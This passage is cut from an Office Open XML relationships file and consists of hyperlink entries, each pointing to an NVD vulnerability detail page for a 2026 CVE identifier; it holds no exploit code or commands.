Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69287" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69292" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69299" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69300" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69309" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69310" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69311" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69331" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69333" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69335" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69341" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69362" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69379" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69383" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69385" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69388" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69394" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69398" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69401" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69404" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69410" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69430" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69440" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69441" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69448" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69466" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69468" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69470" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69472" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69473" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69488" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69492" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69498" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69500" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69501" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69516" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69517" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69540" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69549" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69560" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69563" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69564" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69567" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69573" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69574" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69575" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69578" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69581" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69600" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69605" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69606" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69610" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69611" TargetMode="External" Id="rId959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69613" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69617" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69621" TargetMode="External" Id="rId962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69630" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69645" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69648" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69652" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69654" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69682" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69692" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69693" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69694" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69708" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69711" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69735" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69779" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69791" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69806" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70577" TargetMode="External" Id="rId996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70578" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70585" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71340" TargetMode="External" Id="rId1001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71342" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71351" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71353" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72926" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72930" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72952" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72963" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73003" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73005" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77485" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77897" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78464" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80093" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81192" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81389" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83940" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85360" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86135" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50646" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62384" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62385" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62815" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63312" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69222" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70626" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72789" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73294" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75595" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77037" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77078" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78675" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78676" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78677" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78681" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78682" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78683" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79657" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79674" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79676" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80205" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80206" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82333" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83605" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83606" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83607" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83608" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83609" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83612" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83613" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83614" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83615" TargetMode="External" Id="rId1060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83616" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83617" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83618" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83619" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId1065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId1066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId1067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId1068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84452" TargetMode="External" Id="rId1069" /><Relationship 